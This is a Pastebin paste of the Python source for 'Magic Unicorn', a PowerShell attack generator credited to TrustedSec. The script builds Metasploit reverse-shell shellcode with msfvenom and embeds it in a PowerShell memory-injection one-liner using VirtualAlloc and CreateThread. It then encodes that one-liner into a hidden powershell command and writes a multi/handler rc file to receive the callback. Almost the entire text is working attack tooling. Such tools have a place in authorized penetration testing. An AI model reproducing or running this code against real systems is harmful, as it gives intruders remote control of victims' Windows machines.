API tools faq
paste
Sh3lLDu5T

Unicorn-Powershell-Payload-Generator

Sh3lLDu5T
Mar 4th, 2015
686
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.63 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #
  3. # Magic Unicorn - PowerShell downgrade attack tool
  4. #
  5. # Written by: Dave Kennedy (@HackingDave)
  6. # Company: TrustedSec (@TrustedSec) https://www.trustedsec.com
  7. #
  8. # Real quick down and dirty for native x86 powershell on any platform
  9. #
  10. # Usage: python unicorn.py payload reverse_ipaddr port
  11. # Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
  12. #
  13. # Requirements: Need to have Metasploit installed.
  14. #
  15. # Special thanks to Matthew Graeber and Josh Kelley
  16. #
  17. import base64
  18. import re
  19. import subprocess
  20. import sys
  21.  
  22. # generate base shellcode
  23. def generate_shellcode(payload,ipaddr,port):
  24.     port = port.replace("LPORT=", "")
  25.     proc = subprocess.Popen("msfvenom -p %s LHOST=%s LPORT=%s -a x86 --platform windows -f c" % (payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
  26.     data = proc.communicate()[0]
  27.     # start to format this a bit to get it ready
  28.     repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'buf=' : '', 'Found 0 compatible encoders' : '', 'unsignedcharbuf[]=' : ''}
  29.     data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
  30.     return data
  31.  
  32. def format_payload(payload, ipaddr, port):
  33.     # generate our shellcode first
  34.     shellcode = generate_shellcode(payload, ipaddr, port).rstrip()
  35.     # sub in \x for 0x
  36.     shellcode = re.sub("\\\\x", "0x", shellcode)
  37.     # base counter
  38.     counter = 0
  39.     # count every four characters then trigger floater and write out data
  40.     floater = ""
  41.     # ultimate string
  42.     newdata = ""
  43.     for line in shellcode:
  44.         floater = floater + line
  45.         counter = counter + 1
  46.         if counter == 4:
  47.             newdata = newdata + floater + ","
  48.             floater = ""
  49.             counter = 0
  50.  
  51.     # heres our shellcode prepped and ready to go
  52.     shellcode = newdata[:-1]
  53.    
  54.     # one line shellcode injection with native x86 shellcode
  55.     powershell_code = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" %  (shellcode))
  56.  
  57.     full_attack = "powershell -nop -win hidden -noni -enc " + base64.b64encode(powershell_code.encode('utf_16_le'))  
  58.  
  59.     # write out powershell attacks
  60.     filewrite = file("powershell_attack.txt", "w")
  61.     filewrite.write(full_attack)
  62.     filewrite.close()
  63.  
  64.     # write out rc file
  65.     filewrite = file("unicorn.rc", "w")
  66.     filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (payload,ipaddr,port))
  67.     filewrite.close()
  68.  
  69.     print "[*] Exported powershell output code to powershell_attack.txt."
  70.     print "[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute."
  71.  
  72. # pull the variables needed for usage
  73. try:
  74.  
  75.     payload = sys.argv[1]
  76.     ipaddr = sys.argv[2]
  77.     port = sys.argv[3]
  78.     format_payload(payload,ipaddr,port)
  79.  
  80. # except out of index error
  81. except IndexError:
  82.  
  83.     print r"""
  84.                                                         ,/
  85.                                                        //
  86.                                                      ,//
  87.                                          ___   /|   |//
  88.                                      `__/\_ --(/|___/-/
  89.                                   \|\_-\___ __-_`- /-/ \.
  90.                                  |\_-___,-\_____--/_)' ) \
  91.                                   \ -_ /     __ \( `( __`\|
  92.                                   `\__|      |\)\ ) /(/|
  93.           ,._____.,            ',--//-|      \ |  '   /
  94.          /     __. \,          / /,---|       \      /
  95.         / /    _. \ \       `/`_/ _,'        |     |
  96.        |  | ( (  \  |      ,/\'__/'/          |     |
  97.        |  \ \`--, `_/_------______/           \(   )/
  98.        | | \ \_. \,                            \___/\
  99.        | |  \_   \ \                                \
  100.        \ \   \_ \  \  /                             \
  101.         \ \ \._  \__ \_|       |                       \
  102.          \ \___  \     \      |                        \
  103.           \__ \__ \ \_ |       \                        |
  104.           |  \_____ \ ____      |                        |
  105.           | \ \__ ---' .__\    |        |               |
  106.           \ \__ ---   /   )     |        \             /
  107.            \  \____/ / ()(      \         `---_       /|
  108.             \__________/(,--__    \_________.    |    ./ |
  109.               |     \ \ `---_\--,           \  \_,./   |
  110.               |      \ \_ ` \   /`---_______-\  \\    /
  111.                \     \.___,`|   /              \  \\   \
  112.                 \    |  \_ \|   \             (   |:    |
  113.                  \   \     \   |             /  / |    ;
  114.                   \   \     \   \         ( `_'   \ |
  115.                    \.   \     \.   \         `__/   |  |
  116.                      \  \      \.  \               |  |
  117.                       \  \       \ \              (  )
  118.                        \  |        \ |              |  |
  119.                         |  \        \ \             I  `
  120.                         ( __;        ( _;            ('-_';
  121.                         |___\       \___:            \___:
  122. """
  123.     print "--------------------Magic Unicorn Attack Vector\n\n-----------------------------"
  124.     print "Real quick down and dirty for native x86 powershell on any platform"
  125.     print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)"
  126.     print "Twitter: @TrustedSec, @HackingDave"
  127.     print "Happy Magic Unicorns."
  128.     print "\n"
  129.     print "Usage: python unicorn.py payload reverse_ipaddr port"
  130.     print "Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443"
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!